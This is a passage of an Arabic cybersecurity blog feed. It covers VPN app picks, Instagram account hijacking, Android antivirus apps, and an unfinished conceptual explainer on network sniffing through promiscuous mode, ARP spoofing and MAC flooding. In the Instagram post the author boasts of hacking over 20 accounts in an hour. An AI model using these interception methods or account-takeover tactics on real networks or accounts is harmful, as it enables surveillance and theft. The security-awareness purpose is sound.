</content:encoded><category>السلامة الرقمية</category><category>العودة إلى المدارس</category><category>سلامة الأطفال</category><category>كلمات المرور</category><category>التصيد الاحتيالي</category><category>الخصوصية</category></item><item><title>أفضل 3 تطبيقات VPN لنظام الأندرويد</title><link>https://blog.cyberpedia.site/best-vpn-apps-for-android/</link><guid isPermaLink="true">https://blog.cyberpedia.site/best-vpn-apps-for-android/</guid><description>فوائد استخدام VPN على هاتف أندرويد، ومقارنة مختصرة بين ExpressVPN وCyberGhost وIPVanish من حيث التشفير والسرعة وسياسة عدم الاحتفاظ بالسجلات.</description><pubDate>Sat, 27 Aug 2022 00:16:48 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;تطبيقات VPN تخفي عنوان IP ومكانك الفعلي وتحمي سجل التصفح واتصالك في الشبكات اللاسلكية العامة وتساعد على تجاوز المراقبة. أفضل ثلاثة تطبيقات لأندرويد من حيث السرعة والأمان هي ExpressVPN وCyberGhost وIPVanish، وتتميز جميعها بتشفير بدرجة عسكرية ومفتاح إيقاف تلقائي، ويمكن تحميلها من مواقعها الرسمية.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;يعد امتلاك أدوات الخصوصية والأمن الرقمي المناسبة طريقة رائعة للبقاء بشكل آمن ومحمي على شبكة الانترنت ولكن الأمر الذي يجعل هذه الأدوات أكثر فاعلية هو معرفة كيفية استخدامها بالشكل الأمثل&lt;/p&gt;
&lt;p&gt;تجمع الشبكة الخاصة الافتراضية VPN الآمنة بين الميزات التي تعزز خصوصية وأمان بياناتك الشخصية في كل مرة تتصل فيها بالإنترنت&lt;/p&gt;
&lt;h2 id=&quot;فوائد-استخدام-vpn&quot;&gt;فوائد استخدام VPN&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;حماية بصمتك الرقمية من خلال إخفاء عنوانك IP ومكانك الفعلي&lt;/li&gt;
&lt;li&gt;الحفاظ على سجل التصفح الخاص بك بعيداً عن أعين الجهات الخبيثة&lt;/li&gt;
&lt;li&gt;حماية اتصالك في الشبكات اللاسلكية العامة الغير آمنة&lt;/li&gt;
&lt;li&gt;تأمين وحماية المعلومات الحساسة المتبادلة عبر الانترنت&lt;/li&gt;
&lt;li&gt;تجاوز المراقبة&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يعتبر تطبيق VPN المجاني من أكثر المواضيع تداول بين مستخدمي الهواتف الذكية في الدول المحظورة عامة ومستخدمي هواتف أندرويد خاصة&lt;/p&gt;
&lt;p&gt;وذلك يعود لكثرة التطبيقات من هذا النوع اضافة إلى انتشار الشائعات حول إمكانية إختراق مستخدمي هذه التطبيقات&lt;/p&gt;
&lt;h2 id=&quot;إليك-أفضل-3-تطبيقات-vpn-من-حيث-السرعة-والأمان&quot;&gt;إليك أفضل 3 تطبيقات VPN من حيث السرعة والأمان&lt;/h2&gt;
&lt;h3 id=&quot;1-expressvpn&quot;&gt;&lt;a href=&quot;https://www.expressvpn.com/go/vpn-software/vpn-android-1&quot;&gt;1. ExpressVPN&lt;/a&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;يحمي التشفير بدرجة عسكرية وسياسة صارمة لعدم الاحتفاظ بالسجلات ومفتاح القفل التلقائي المعلومات الشخصية على جهاز أندرويد الخاص بك&lt;/li&gt;
&lt;li&gt;سرعات فائقة للبث غير المنقطع، والألعاب، والتورنت، والتصفح باستخدام جهاز أندرويد الخاص بك&lt;/li&gt;
&lt;li&gt;أكثر من 3000 خادم في 94 دولة للوصول إلى المحتوى من جميع أنحاء العالم&lt;/li&gt;
&lt;li&gt;5 اتصالات متزامنة للأجهزة&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;2-cyberghost&quot;&gt;&lt;a href=&quot;https://www.cyberghostvpn.com/en_US/offer/vpn-for-android?source=androiden&amp;amp;coupon=3Y3M&amp;amp;brand=vpnMentor&amp;amp;aff_sub4=1y29b&amp;amp;aff_sub=eyJwaWQiOiIxfEw3QjRLN0RBNktWNFoiLCJjaWQiOiIxfEw3QjRLN0RBNktWNFp8MnwxNjE1IiwicyI6IjEifQ_cor353865010&amp;amp;aff_sub2=D202208261912_o&amp;amp;aff_id=1004&quot;&gt;2. CyberGhost&lt;/a&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;خوادم مُحسَّنة من أجل البث السلس وأنشطة التورنت على جهاز أندرويد&lt;/li&gt;
&lt;li&gt;تطبيق أندرويد سهل الاستخدام للحفاظ على بياناتك آمنة دون متاعب&lt;/li&gt;
&lt;li&gt;تشفير من الدرجة العسكرية، وسياسة صارمة لعدم الاحتفاظ بالسجلات، ومفتاح إيقاف تلقائي للحماية القصوى على جهاز أندرويد الخاص بك&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;3-ipvanish&quot;&gt;&lt;a href=&quot;https://www.ipvanish.com/exclusive/?cjevent=11829a48259d11ed83a000d70a180512&amp;amp;cjdata=MXxOfDB8WXww&quot;&gt;3. IPVanish&lt;/a&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;سرعات فائقة للتصفح والبث على جهاز أندرويد الخاص بك دون الحاجة إلى تخزين مؤقت&lt;/li&gt;
&lt;li&gt;تطبيق أندرويد سهل الاستخدام مع ميزات قابلة للتخصيص لمنحك الحماية التي تحتاجها&lt;/li&gt;
&lt;li&gt;تشفير من الدرجة العسكرية ومفتاح قفل وحماية من التسرب للحفاظ على سلامتك أثناء استخدام جهاز أندرويد&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;جميع التطبيقات تستطيع تحميلها من موقعها الرسمي من خلال الضغط على الاسم فقط.&lt;/p&gt;
&lt;p&gt;عندما تتصل بالإنترنت دون استخدام شبكة خاصة افتراضية VPN يمكن تتبع كل ما تفعله على جهازك وكشفه وبالمقابل في اللحظة التي تقوم فيها بتشغيل VPN الخاص بك تتم حماية هذه المعلومات تلقائياً ولا يتم تخزينها تماماً كما يجب أن تكون&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>VPN</category><category>أندرويد</category><category>الخصوصية</category><category>ExpressVPN</category><category>CyberGhost</category><category>IPVanish</category></item><item><title>احذر من اختراق حسابك على انستغرام</title><link>https://blog.cyberpedia.site/instagram-hacking/</link><guid isPermaLink="true">https://blog.cyberpedia.site/instagram-hacking/</guid><description>لماذا يسهل اختراق حسابات انستغرام مقارنة بفيسبوك ويصعب استعادتها، وما الإجراءات الوقائية التي تحمي حسابك الشخصي أو التجاري قبل فوات الأوان.</description><pubDate>Sat, 20 Aug 2022 12:37:40 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;يستبدل المهاجمون البريد ورقم الهاتف ويفعّلون المصادقة الثنائية على الحساب المخترق لمنع صاحبه من استعادته، وغالبًا لا يساعد انستغرام الضحايا لأنه لا يتتبع السلوك غير الطبيعي كما يفعل فيسبوك. لحماية حسابك استخدم كلمة سر قوية، وفعّل المصادقة الثنائية بتطبيق مخصص، وراجع نشاط تسجيل الدخول، وجهّز وسيلة بديلة للتواصل مع عملائك.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;تصلني رسائل بشكل دائم من أشخاص يطلبون المساعدة في استعادة حساباتهم المخترقة على انستغرام، في بعض الحالات يمكن أن يكون السبب هو أخطاء من قبل هؤلاء الأشخاص كاستخدامهم كلمات سر ضعيفة يمكن تخمينها أو إعادة استخدامهم لنفس كلمة السر ضمن أكثر من حساب على شبكة الانترنت أو وقوعهم ضحايا لهجمات التصيد الاحتيالي Phishing Attack أو العديد من الهجمات وطرق الخداع الأخرى&lt;/p&gt;
&lt;p&gt;ولكن في حالات عديدة أخرى لم يكن هناك أي أخطاء أمنية من قبل صاحب الحساب، المصادقة الثنائية كانت مفعلة ولم يتم إرتكاب أي أخطاء أو ممارسات تؤدي لاختراق الحساب&lt;/p&gt;
&lt;p&gt;في كل الحالات لم يتمكن أصحاب الحسابات من استرجاع حساباتهم حتى بعد الإبلاغ أو التواصل مع انستغرام&lt;/p&gt;
&lt;h2 id=&quot;أسلوب-المهاجم&quot;&gt;أسلوب المهاجم&lt;/h2&gt;
&lt;p&gt;تعمل الجهات المنفذة لعمليات الاختراق على استبدال كافة المعلومات المرتبطة بالحساب كعنوان البريد الالكتروني ورقم الهاتف بالإضافة لاستخدام المصادقة الثنائية لمنع أي محاولة لاستعادة الحساب من قبل صاحبه الأصلي&lt;/p&gt;
&lt;p&gt;من وجهة نظر المهاجم فإن اختراق حسابات الانستغرام هو أمر سهل جداً بالمقارنة مع اختراق حسابات الفيسبوك&lt;/p&gt;
&lt;p&gt;على سبيل المثال: خلال ساعة واحدة فقط تمكنت من اختراق أكثر من 20 حساب من بلدان مختلفة ومن نفس الجهاز ومن نفس العنوان الشبكي IP بالمقارنة مع اختراق حسابات الفيسبوك والتي تزداد صعوبة يوماً بعد يوم ففي معظم الحالات التي احصل بها على كلمة السر الخاصة بحساب الفيسبوك للمستخدم لا أتمكن من الوصول للحساب بسهولة لأن الفيسبوك يكتشف أن هذا النشاط غير طبيعي أو أن الحساب قد تم فتحه من مكان أو جهاز جديد وفي معظم الحالات يتم قفل الحساب ويحتاج الأمر لطرق أخرى للاستمرار في هذه العملية&lt;/p&gt;
&lt;p&gt;وفي معظم الحالات عندما أقوم بمحاولة اختراق حساب آخر سيتم منعي من الدخول إلى الفيسبوك وهذا الأمر يؤكد أن خوارزمية الفيسبوك تعمل على تتبع السلوك والنشاط الخاص بالمستخدم حيث يتم التعرف على جهازي وعنواني الشبكي IP ومنعي من القيام بهذه الأمور ، بالمقابل هذه الخوارزميات غير مطبقة في الانستغرام و بالإضافة إلى أن الانستغرام من النادر أن يساعد مستخدميه&lt;/p&gt;
&lt;h2 id=&quot;أهمية-انستغرام-للشركات-والأعمال&quot;&gt;أهمية انستغرام للشركات والأعمال&lt;/h2&gt;
&lt;p&gt;تعتمد العديد من الشركات على الانستغرام للقيام بعمليات الإعلان والتسويق وعندما نقول كلمة “تعتمد” فهذا يعني أن حسابهم ضروري لأعمالهم التجارية وتطور هذا الأمر بشكل كبير بعد جائحة كورونا فقد لجأت المطاعم إلى تحديث قوائمها وجداول حجوزاتها على حسابهم التجاري على انستغرام وبشكل مشابه للعديد من الشركات والأعمال التجارية الأخرى&lt;/p&gt;
&lt;p&gt;أثناء البحث قبل كتابة هذا المقال وجدت بعض التقارير التي تتحدث عن مطاعم وشركات قد لجأت لدفع مبالغ مالية (فدية) لاستعادة حساباتهم المخترقة، لقد كانت هذه طريقتهم الوحيدة للقيام بذلك&lt;/p&gt;
&lt;p&gt;الطريقة الوحيدة التي استعاد فيها بعض الأشخاص حساباتهم هي من خلال التواصل المباشر مع أصدقاء أو معارف لهم يعملون ضمن شركة Meta ومعظمنا لسنا محظوظين لهذه الدرجة ولا نملك أصدقاء مثل هؤلاء لمساعدتنا للقيام بذلك.&lt;/p&gt;
&lt;p&gt;الأمر يزداد سوءاً فقد كشفت بعض التقارير عن حملات لهجمات تصيد احتيالي Phishing Attack تستهدف حسابات الأعمال والأشخاص المؤثرين وبعد السيطرة على هذه الحسابات يطلب منفذو هذه الهجمات مبالغ مالية كفدية للقيام بإعادة الحساب&lt;/p&gt;
&lt;p&gt;الهجمات تزداد بوتيرة عالية وعلى نطاق واسع ومع ذلك يلتزم انستغرام بالصمت تجاه هذا الأمر&lt;/p&gt;
&lt;h2 id=&quot;ما-الذي-يمكننا-فعله-حيال-ذلك&quot;&gt;ما الذي يمكننا فعله حيال ذلك؟&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;إذا كان عملك يعتمد بشكل كبير على الانستغرام ولا تستطيع الانتقال لخدمات أخرى مماثلة مثل:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.flickr.com/&quot;&gt;Flicker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://imgur.com/&quot;&gt;Imgur&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.pinterest.com/&quot;&gt;Pinterest&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://retrica.co/&quot;&gt;Retrica&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;وإن لم يتم اختراق حسابك حتى هذه اللحظة فمن الأفضل أن لا تنتظر هذه اللحظة بل استعد لها من الآن لأنه لا يمكن الوثوق بالإنستغرام وابدأ باتخاذ بعض الإجراءات الوقائية التي تساعدك على منع حدوث ذلك أو التخفيف من الضرر في حال وقوعه:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;تأكد من استخدامك لكلمات سر قوية، لا تحوي على معلوماتك الشخصية كرقم هاتفك أو تاريخ ميلادك أو اسم حيوانك الأليف أو أي معلومات أخرى متعلقة بك يمكن للمهاجم الحصول عليها&lt;/li&gt;
&lt;li&gt;تأكد من تفعيل المصادقة الثنائية من خلال استخدام أكثر من طريقة عبر رسائل SMS (يمكن للمهاجم الحصول على هذا الرمز في حال تمكن من اختراق جهازك) أو من خلال تطبيقات مخصصة لهذه العملية مثل Microsoft Authenticator وGoogle Authenticator وDuo Mobile&lt;/li&gt;
&lt;li&gt;في حال كان نشاطك التجاري يعتمد على الانستغرام فيجب أن تجد طريقة بديلة بشكل استباقي لتتمكن من التواصل مع عملائك في حال تم اختراق حسابك ولم تتمكن من استعادته، يمكن أن تحصل على عناوين البريد الالكتروني لعملائك من خلال طلب تسجيل على خدمة معينة تطلب من العملاء إدخال عنوان بريدهم الالكتروني&lt;/li&gt;
&lt;li&gt;تعلم أساسيات الأمن السيبراني (في يومنا الحالي أصبح الأمن السيبراني حاجة وليس رفاهية) من الضروري لك كمستخدم عادي أن تتعلم أساسيات الأمن السيبراني، لا أقصد هنا تعلم الأمور التقنية المعقدة ولكن يكفي الاطلاع على أساليب المهاجمين وطرق الخداع وطرق الحماية الأساسية وهذا الأمر يمكنك الحصول عليه بشكل سريع من خلال دورة “&lt;a href=&quot;https://bookipedia.site/course/protection-guide/&quot;&gt;دليل الحماية الشامل&lt;/a&gt;” والتي تتضمن 130 نصيحة للحماية والأمان على شبكة الانترنت&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;لنفرض أنك لم تتبع النصائح السابقة، فأنا متأكد من أنه سيتم اختراق حسابك وما هي إلا مسألة وقت ليتم ذلك (احذر من هذا الأمر قد أكون أنا من يفعل ذلك)&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;نصائح-الحماية&quot;&gt;نصائح الحماية&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;في النهاية إليك بعض النصائح لتتمكن من تقييم وضع الحماية الخاص بحسابك:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;قم بالدخول إلى الإعدادات – الأمان – نشاط تسجيل الدخول وتأكد من الأماكن والأجهزة التي تم من خلالها تسجيل الدخول لحسابك وفي حال وجدت أي جهاز مشبوه قم بالضغط على تسجيل الخروج وتأكد من إعادة تعيين كلمة السر الخاصة بك&lt;/li&gt;
&lt;li&gt;تأكد من إمكانية وصولك لحساب البريد الالكتروني المرتبط بحسابك وتأكد أيضاً من رقم الهاتف أنه يعمل ويمكنك الوصول له&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;لا يجب أن تنتظر ليتم اختراقك ابدأ الآن باتباع الملاحظات والنصائح السابقة لتحصل على خطوة استباقية للحماية ضد الهجمات والتهديدات المحتملة&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>انستغرام</category><category>اختراق الحسابات</category><category>المصادقة الثنائية</category><category>التصيد الاحتيالي</category><category>كلمات السر</category></item><item><title>أفضل 5 تطبيقات حماية لأجهزة الأندرويد</title><link>https://blog.cyberpedia.site/best-android-antivirus/</link><guid isPermaLink="true">https://blog.cyberpedia.site/best-android-antivirus/</guid><description>مراجعة لأفضل 5 تطبيقات حماية لهواتف أندرويد: Avast وBouncer وLookout وMalwarebytes وNox، مع أبرز ميزات كل تطبيق في مكافحة الفيروسات والخصوصية.</description><pubDate>Mon, 04 Jul 2022 10:17:20 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;يستعرض المقال خمسة تطبيقات حماية لهواتف أندرويد: Avast Mobile Security للحماية الشاملة، وBouncer لإدارة أذونات التطبيقات، وLookout لتتبع الجهاز ومكافحة الفيروسات، وMalwarebytes للحماية من الفدية والبرمجيات الخبيثة، وNox لتنظيف الفيروسات وتحسين الأداء.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في الوقت الحاضر ، يمتلك كل شخص تقريباً هاتفاً ذكياً، إنها طريقتنا في التواصل مع العائلة والأصدقاء وزملاء العمل وحتى العالم، هواتف Android هي المفضلة لدى الكثيرين للتواصل مع المجتمع، إنها موثوقة تماماً مثل أجهزة iPhone وتوفر للمستخدم تخصيصاً غير متاح على أجهزة iPhone، هواتف Android أقل تكلفة وإذا كنت تستخدم Google لأي شيء فهي الخيار الواضح.&lt;/p&gt;
&lt;p&gt;فيما يلي بعض من أفضل تطبيقات الأمان لمستخدمي Android، الأمان مهم سواء كنت محترفاً أمنياً وترغب في الحفاظ على بياناتك من التهديدات أو الهجمات الإلكترونية أو مجرد فرد يريد الحفاظ على خصوصية معلوماته، وبغض النظر عن نوع الهاتف الذي تختاره ، فحتى هواتف Android تحتاج إلى الحفاظ على معلوماتك الشخصية آمنة وسرية أفضل طريقة للقيام بذلك هي من خلال تثبيت تطبيق أمان على هاتف Android الخاص بك.&lt;/p&gt;
&lt;h2 id=&quot;1-avast-mobile-security&quot;&gt;1. &lt;a href=&quot;https://www.avast.com/en-us/free-mobile-security&quot;&gt;Avast Mobile Security&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;يوفر تطبيق Avast Mobile Security لهواتف Android العديد من الخيارات للمستخدم الذي يريد الحفاظ على أمان البيانات. إنه تطبيق أمان شامل يحمي هاتفك من التصيد والبرامج الضارة وبرامج التجسس والفيروسات الضارة مثل أحصنة طروادة. التطبيق متاح كمنتج مجاني واشتراك مدفوع في Avast Mobile. كما أنه متاح لمستخدمي أجهزة iPhone أيضًا.&lt;/p&gt;
&lt;p&gt;تتيح ميزة مكافحة السرقة للمستخدمين أيضًا تحديد موقع هاتف Android وتتبعه والتحكم فيه عن بُعد ، حتى في حالة فقده أو سرقته. يوفر تطبيق Avast Mobile أيضًا أداة مبتكرة ، تسمى Sandbox ، تقلل من فرص وصول الفيروسات إلى جهازك. يتميز تطبيق Avast لأجهزة Android بمسح ضوئي في الوقت الفعلي ومدير كلمات مرور وأداة أمان للمتصفح. هذا التطبيق مليء بالمزيد من الميزات أيضًا. تحظى سمعتهم أيضًا باحترام كبير ولديهم الآلاف من العملاء الراضين.&lt;/p&gt;
&lt;h2 id=&quot;2-bouncer&quot;&gt;2. &lt;a href=&quot;https://play.google.com/store/apps/details?id=com.samruston.permission&amp;amp;hl=en_IN&amp;amp;gl=US&quot;&gt;Bouncer&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;يساعد تطبيق Bouncer لمستخدمي Android في التحكم في الأذونات المطلوبة من التطبيقات المختلفة التي تحاول التنزيل أو التثبيت على هاتفك. تمامًا مثل الحارس في ملهى ليلي يراقب ضيوفه المميزين ، يحمي تطبيق Bouncer أيضًا المتسللين غير المرغوب فيهم أو التهديدات الإلكترونية من التطبيقات الأخرى التي تتسلل إلى بياناتك دون إذن. تبلغ تكلفة تطبيق Android 0.99 دولارًا على متجر Google play. كل ما عليك فعله لتشغيله هو تمكينه ضمن إعدادات إمكانية الوصول بهاتف Android الخاص بك. لن يستهلك التطبيق أي عمر لبطارية هاتفك. بالإضافة إلى ذلك ، لا يخزن أو ينقل بياناتك الشخصية. باستخدام التطبيق ، لديك خيار الاحتفاظ أو إزالة أو جدولة إزالة الإذن الممنوح من أي تطبيقات تحاول الوصول إلى هاتفك للوصول إليه. ضع في اعتبارك أن تطبيق Bouncer Android هو حاليًا في شكل تجريبي. قد تتوفر ميزات أخرى في وقت لاحق.&lt;/p&gt;
&lt;h2 id=&quot;3lookout&quot;&gt;3.&lt;a href=&quot;https://play.google.com/store/apps/details?id=com.lookout&amp;amp;hl=en&amp;amp;gl=US&quot;&gt;Lookout&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;يعد تطبيق Lookout Security تطبيقاW شاملاً لأمان الهاتف المحمول ومكافحة الفيروسات لهاتفك. يعمل Lookout على حماية جهازك المحمول وبياناتك وهويتك. يتتبع التطبيق أي فيروسات وبرامج ضارة وهجمات التصيد الكامنة على هاتف Android الخاص بك. يمكن لتطبيق Lookout أيضاW تحديد موقع جهازك في حالة فقده أو سرقته. باستخدام مرشد النظام المثبت ويمكن للتطبيق التحقق من اكتشافات الروت للتأكد من أن نظام التشغيل يعمل بشكل صحيح، يأتي التطبيق كاملاً مع استعادة الهوية بالإضافة إلى ذلك يقدم تطبيق Lookout خطط تأمين ضد سرقة الهوية بقيمة مليون دولار لمن يحتاجون إلى مزيد من الحماية مثل المتخصصين في مجال الأمن&lt;/p&gt;
&lt;p&gt;قم بعملية فحص لجهازك وسيتولى Lookout الباقي، يُصنف تطبيق Lookout كأحد أفضل تطبيقات الأمان لنظام Android نظراً لالتزامه بتقديم خدمة أفضل وهذا التطبيق حاصل على تصنيف 4.7 من 5&lt;/p&gt;
&lt;h2 id=&quot;4-malwarebytes&quot;&gt;4. &lt;a href=&quot;https://play.google.com/store/apps/details?id=org.malwarebytes.antimalware&amp;amp;hl=en&amp;amp;gl=US&quot;&gt;Malwarebytes&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;يوفر تطبيق الأمان Malwarebytes حماية متقدمة ضد البرامج الضارة وبرامج الفدية والتهديدات الإلكترونية الأخرى التي قد تؤثر على أجهزة Android، تحمي Malwarebytes جميع أجهزتك بما في ذلك جهاز الكمبيوتر الخاص بك، يكتشف ويزيل التطبيق التهديدات الإلكترونية تلقائياً ويحافظ على تشغيل جهازك بسلاسة، تأتي Malwarebytes أيضاً مع تدقيق الخصوصية لإعلامك بالتطبيقات التي تراقب كل ما تفعله ويكتشف التطبيق أيضاً برامج الفدية قبل أن تتمكن من قفل جهازك ويمنح المستخدم حماية في الوقت الفعلي تحمي الجهاز من الإصابة بالبرمجيات الخبيثة، تقوم Malwarebytes بتنفيذ أكثر من 90.000 عملية تثبيت كل يوم وتفحص أكثر من 200 مليون تطبيق Malwarebytes كل شهر وتكتشف أو تحظر أكثر من 20 مليون تهديد كل يوم.&lt;/p&gt;
&lt;p&gt;هناك العديد من الخطط للاختيار من بينها تتضمن أنواعاً عديدة من الميزات المصممة لإرضاء كل نوع من المستخدمين وتلبية احتياجاتهم الشخصية، يجب أن يكون لدى مستخدم Android إصدار Android 6.0 على الأقل أو إصدار أحدث حتى يعمل.&lt;/p&gt;
&lt;h2 id=&quot;5-nox&quot;&gt;5. &lt;a href=&quot;https://play.google.com/store/apps/details?id=com.noxsystems.noxclient&amp;amp;hl=en&amp;amp;gl=US&quot;&gt;Nox&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;يقدم تطبيق الأمان Nox العديد من الميزات فهو يوفر الأمان للمستخدم من خلال القيام بعمليات تنظيف مجانية للفيروسات بالإضافة لمُعزِّز للذاكرة كما يوفر التطبيق أيضاً موفراً للبطارية ومبرد لوحدة المعالجة المركزية وتدابير أمان الشبكة اللاسلكية WiFi لجميع أجهزة Android، يعمل مبرد وحدة المعالجة المركزية على حماية جهازك من الحرارة الزائدة بالإضافة إلى ذلك يمنع موفر البطارية التطبيقات الأخرى على هاتفك من استنزاف عمر البطارية.&lt;/p&gt;
&lt;p&gt;التطبيق حاصل أيضاً على تقييم 4.4 من أصل 5.&lt;/p&gt;
</content:encoded><category>السلامة الرقمية</category><category>أندرويد</category><category>تطبيقات الحماية</category><category>مكافحة الفيروسات</category><category>أمن الهواتف</category></item><item><title>التقاط حزم البيانات عبر الشبكة – Network Sniffing</title><link>https://blog.cyberpedia.site/network-sniffing/</link><guid isPermaLink="true">https://blog.cyberpedia.site/network-sniffing/</guid><description>كيف يلتقط المهاجم حزم البيانات عبر الشبكة؟ شرح لنمط promiscuous mode والفرق بين Shared وSwitched Ethernet وهجمات ARP Spoofing وMAC Flooding.</description><pubDate>Fri, 01 Jul 2022 10:18:28 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;التقاط حزم البيانات (Network Sniffing) هو مراقبة كل الحزم المارة عبر الشبكة ببرامج أو أجهزة. يسهل ذلك في الشبكات المعتمدة على Hub، أما في شبكات السويتش فيتلاعب المهاجم بعمل السويتش عبر ARP Spoofing أو MAC Flooding، ويشغّل كرت الشبكة بنمط promiscuous mode ليلتقط كلمات السر وبيانات البروتوكولات.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;هذه العملية تتم من خلال مراقبة وإلتقاط كل حزم البيانات التي تمر عبر الشبكة باستخدام تطبيقات (برامج) أو أجهزة Hardware Device.&lt;/p&gt;
&lt;p&gt;عملية إلتقاط حزم البيانات تتم بشكل سلسل في الشبكات التي تعتمد على أجهزة Hub كون هذا النوع من الأجهزة يقوم بتمرير حزم البيانات لكل الأجهزة المتصلة به، معظم الشبكات في يومنا الحالي تعتمد على أجهزة السويتش والتي تعمل من خلال الاعتماد على عناوين MAC للأجهزة المتصلة وكل فريم يتم تمريره فقط عبر المنفذ المتصل من خلاله الجهاز الذي يملك عنوان MAC للجهاز الهدف.&lt;/p&gt;
&lt;p&gt;المهاجم يجب أن يتلاعب بآلية عمل السويتش ليتمكن من رؤية كل حركة البيانات التي تمر من خلاله، لأن أدوات إلتقاط حزم البيانات يمكنها فقط إلتقاط حركة البيانات الخاصة بشبكة فرعية معينة subnet ولا يمكنها إلتقاط حزم البيانات من شبكات أخرى، لنفرض أن المهاجم تمكن من وصل جهازه مع الشبكة وعندها يمكنه العمل بنمط promiscuous mode وهذا يسمح له بإلتقاط وتحليل كل حركة البيانات عبر الشبكة.&lt;/p&gt;
&lt;p&gt;بالرغم من أن معظم الشبكات في يومنا الحالي تعمل بالاعتماد على أجهزة السويتش ولكن مازالت آلية إلتقاط حزم البيانات مفيدة حيث يمكن للمهاجم أن يقوم بتنصيب برامج على الأجهزة التي تمر من خلالها حركة بيانات كبيرة مثل السيرفرات أو أجهزة الراوتر وهذه البرامج يتم التحكم بها من عند بعد وتعمل على إلتقاط حزم البيانات وهذا يسمح للمهاجم بالحصول على حزم البيانات التي تحوي على معلومات حساسة ككلمات السر وحركة البيانات الخاصة بإعدادات أجهزة الشبكة&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;يمكن للمهاجم رؤية حركة البيانات الخاصة بالبرتوكولات&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;وسيحصل المهاجم على كمية معلومات كبيرة تسمح له لاحقاً باختراق كامل الخدمات عبر الشبكة، الشكل التالي يوضح عملية إلتقاط حزم البيانات من قبل المهاجم بين أجهزة المستخدمين&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مثال توضيحي لالتقاط الحزم: مستخدمان متصلان عبر Hub أو Switch ومهاجم يعمل كرت شبكته بنمط promiscuous mode فيلتقط الفريمات المارة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.DfP69QVU_1pJ3zM.webp&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;كيف-تتم-عملية-التقاط-حزم-البيانات&quot;&gt;كيف تتم عملية التقاط حزم البيانات&lt;/h2&gt;
&lt;p&gt;الطريقة الأكثر شيوعاً لإلتقاط حزم البيانات تتم عبر الاتصال السلكي مع الشبكة، الأجهزة ضمن الشبكة تتصل مع بعضها من خلال نوعين من العناوين MAC and IP&lt;/p&gt;
&lt;p&gt;عنوان MAC هو عنوان فريد مرتبط بكرت الشبكة NIC والبرتوكول Ethernet يستخدم عناوين MAC في عملية إرسال واستقبال الفريمات بين الأجهزة أما عناوين IP فتستخدم في الطبقة الثالثة لتوجيه حركة البيانات بين الأجهزة وآلية التحويل بين نظامي العنونة تتم من باستخدام البرتوكول ARP – Address Resolution Protocol&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;يوجد نوعين أساسيين لبيئات الشبكات السلكية وإلتقاط حزم البيانات يمكن أن يتم بكلا النوعين:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Shared Ethernet:&lt;/strong&gt; في هذه البيئة يتم استخدام خط اتصال واحد أو من خلال جهاز hub وكل الأجهزة ستتلقى حزم البيانات التي تخص جهاز معين، فعندما يريد أحد الأجهزة (الجهاز 1) الاتصال مع جهاز آخر (الجهاز 2) يقوم بإرسال حزم البيانات لها عنوان الهدف هو عنوان MAC للجهاز 2 وعندها فإن باقي الأجهزة ضمن نفس الشبكة (الجهاز 3 – الجهاز 4) ستصلهم فريمات البيانات وستتم عملية مقارنة لعنوان MAC الخاص بالجهاز الهدف وسيتم تجاهل هذه البيانات لأنها لا تتطابق مع عناوين MAC في هذه الأجهزة ولكن الجهاز الذي يعمل على إلتقاط البيانات سوف يتجاهل هذه القاعدة وسوف يقبل كل فريمات البيانات، إلتقاط حزم البيانات في هذه البيئة من الشبكات يعتبر passive ومن الصعب اكتشافه&lt;/li&gt;
